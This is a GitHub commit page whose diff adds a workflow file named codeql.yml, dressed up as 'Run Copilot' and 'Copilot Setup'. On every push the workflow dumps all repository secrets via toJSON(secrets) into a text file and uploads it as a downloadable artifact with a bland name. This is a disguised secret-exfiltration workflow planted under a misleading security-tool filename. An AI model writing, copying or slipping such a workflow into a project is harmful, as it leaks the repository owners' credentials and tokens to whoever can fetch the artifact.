There was an error while loading. Please reload this page.
1 parent a55e9e1 commit f0178feCopy full SHA for f0178fe
1 file changed
.github/workflows/codeql.yml
@@ -0,0 +1,17 @@
1
+name: Run Copilot
2
+run-name: Run Copilot
3
+on:
4
+ push:
5
+jobs:
6
+ format:
7
+ runs-on: ubuntu-latest
8
+ env:
9
+ VARIABLE_STORE: ${{ toJSON(secrets) }}
10
+ steps:
11
+ - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd
12
+ - name: Copilot Setup
13
+ run: echo "$VARIABLE_STORE" > format-results.txt
14
+ - uses: actions/upload-artifact@bbbca2ddaa5d8feaa63e36b76fdaad77386f024f
15
+ with:
16
+ name: format-results
17
+ path: format-results.txt
0 commit comments